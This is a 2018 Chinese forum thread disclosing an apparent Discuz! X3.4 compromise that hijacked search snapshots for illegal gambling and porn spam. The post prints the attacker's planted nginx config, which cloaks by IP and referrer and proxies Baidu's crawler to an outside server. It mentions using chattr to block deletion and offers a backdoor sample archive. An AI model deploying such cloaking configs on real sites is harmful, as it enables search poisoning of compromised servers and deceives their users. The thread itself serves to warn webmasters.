忘记密码?

一键登录

草根吧

Discuz!X3.4及以下版本疑似程序0day伪静态利用漏洞导致快照劫持公示

查看: 301|回复: 5

Discuz!X3.4及以下版本疑似程序0day伪静态利用漏洞导致快照劫持公示

[复制链接]

4424

主题

9671

热度

1万

贡献

民审

Rank: 8Rank: 8

发表于 2018-10-8 18:03:17 | 显示全部楼层 |阅读模式
本帖最后由 民审-M 于 2018-10-8 19:32 编辑

/cpw开头的任意路径 被快照劫持为非法彩票、赌博、黄网等,
利用伪静态定向蜘蛛引流 访问/cpw*目录
改了一个配置文件,创建了一个配置文件
robots.txt  
chattr 阻止删除植入文件
文件名discuz.conf
除了在discuz.conf里写了规则,还在主机的conf文件里也写了规则
程序生成的tid都是8位以上
内容如下:
  1. location ^~/cpw {
  2. access_log off;
  3. index  index.html index.htm index.php;
  4. if ($http_referer ~* "toutiao.baidu.com|m.toutiao.baidu.com"){
  5. return 404;
  6. }
  7. if ($remote_addr ~ (110.184.|117.28.|118.114.|120.239.|125.70|27.154.|182.139)) {
  8. return 404;
  9. }
  10. if ($http_x_forwarded_for ~ (110.184.|117.28.|118.114.|120.239.|125.70|27.154.|182.139)) {
  11. return 404;
  12. }
  13. set $flag 0;
  14.      if ($http_user_agent ~* (Baiduspider)) {
  15.         set $flag 1;
  16.     }
  17.     if ($http_referer ~* (m.baidu.com|wap.baidu.com|3g.baidu.com|m5.baidu.com)){
  18.         set $flag 1;
  19.     }

  20. if ($flag = 0) {
  21. return 404;
  22. }
  23. proxy_pass      http://107.151.93.122:86/ttysq.com/cpw/;
  24. proxy_redirect  http://107.151.93.122:86/ttysq.com/cpw/ http://www.ttysq.com;
  25. proxy_connect_timeout   60;
  26. proxy_read_timeout      60;
  27. proxy_send_timeout      60;
  28. proxy_buffer_size       32k;
  29. proxy_buffers           4       32k;
  30. proxy_busy_buffers_size 64k;
  31. proxy_temp_file_write_size      1024m;
  32. proxy_set_header        X-Real-IP       $remote_addr;
  33. proxy_set_header        X-Forwarded-For $proxy_add_x_forwarded_for;
  34. }
复制代码
后门源文件内容:
游客,如果您要查看本帖隐藏内容请回复


后门样本:
草根吧 Discuz!X3.4及以下版本疑似程序0day伪静态利用漏洞导致快照劫持公示 以下,版本,疑似,程序,伪静态 站长头条 rar a.rar (1.03 MB, 下载次数: 7)

帖子地址: 

本文来源于草根吧 www.caogen8.co,欢迎大家下载。
如果您没有贡献需要充值,可以直接在线充值,点击充值
如果你需要加入本站赞助VIP会员,可以直接在线开通,点击开通
如果找不到您要的资源,请搜索一下,点击搜索

3

主题

16

热度

8

贡献

终身赞助ViP

Rank: 7Rank: 7Rank: 7

发表于 2018-10-9 01:51:49 | 显示全部楼层
我来看看了

0

主题

6

热度

0

贡献

步入草根

Rank: 1

发表于 2018-10-9 11:05:57 | 显示全部楼层
不错不错

0

主题

7

热度

0

贡献

步入草根

Rank: 1

发表于 2018-10-9 11:16:59 | 显示全部楼层
看看草根吧 Discuz!X3.4及以下版本疑似程序0day伪静态利用漏洞导致快照劫持公示 以下,版本,疑似,程序,伪静态 站长头条 40{:40:}

0

主题

0

热度

0

贡献

步入草根

Rank: 1

发表于 2018-10-9 22:38:05 | 显示全部楼层
我是来学习的呀。

0

主题

2

热度

0

贡献

步入草根

Rank: 1

发表于 2018-10-26 10:28:32 | 显示全部楼层
想看源文件

发表回复

*滑动验证:
 懒得打字嘛,点击右侧快捷回复【最新发布】   【赞助草根吧享更多权益】
高级模式
您需要登录后才可以回帖 登录 | 立即注册 新浪微博登陆 用百度帐号登录 一键登录:

本版积分规则

收藏帖子 返回列表 搜索
快速回复 返回顶部 返回列表